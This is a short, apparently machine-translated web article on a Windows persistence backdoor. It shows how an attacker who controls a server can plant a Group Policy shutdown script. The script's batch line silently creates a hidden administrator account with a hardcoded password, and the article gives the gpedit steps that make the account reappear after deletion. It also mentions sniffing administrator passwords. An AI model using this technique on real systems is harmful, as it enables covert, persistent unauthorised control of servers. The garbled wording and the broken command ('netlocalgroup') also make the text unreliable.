WINDOWS system backdoor instance 3

Group Policy spoofing, the most concealed Backdoor

The Group Policy backdoor is more concealed. Adding the corresponding key values to the table is a common method of Trojan horse running when the system starts. In fact, this function can also be implemented in the most policy. In addition, it can also perform some operations when the system is shut down. This is achieved through the "script startup/shutdown" item in the most policy. The specific location is under "Computer Configuration> Windows Settings. Because of its high concealment, attackers often use it as a server backdoor.

After obtaining control of the server, attackers can use this backdoor to implement long-term control over the host. It can run some programs or scripts through this backdoor. The simplest one is to create an administrator user who can do this:

1) create a script

Create a batch file add. bat. The content of add. bat is:

 
 

  
  
@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit 
 
 

Create an Administrator with the username gslw $ and password test168 ).

2) backdoor Exploitation

In the "run" dialog box, enter gpedit. msc, go to "Computer Configuration 1> Windows Settings 1> script startup/shutdown)", double-click "shutdown" in the right window, and add. bat. That is to say, when the system is shut down, a gslw $ user is created. Generally, a user does not know that there is a hidden user in the system, that is, he sees and deletes the account, and creates the account when the system shuts down. Therefore, if the user does not know the location in the Group Policy, he will be puzzled.

In fact, there are still many exploitation methods for this "backdoor" in the Group Policy, through which attackers can run scripts or programs and sniff administrator passwords. After obtaining the administrator password, they do not need to create an account in the system. They directly use the Administrator account to remotely log on to the system. Therefore, it is also a double-edged sword, and we hope you will pay attention to it. If you are inexplicably attacked by the server, attackers may use it. Figure 6)

1. Technical Analysis of backdoor Trojan horse hiding
2. WINDOWS system backdoor instance 1
3. How to completely clear computer viruses
4. WINDOWS system backdoor instance 2
5. Windows Group Policy ensures the security of shared directories
6. Security Settings Windows Group policies effectively prevent hackers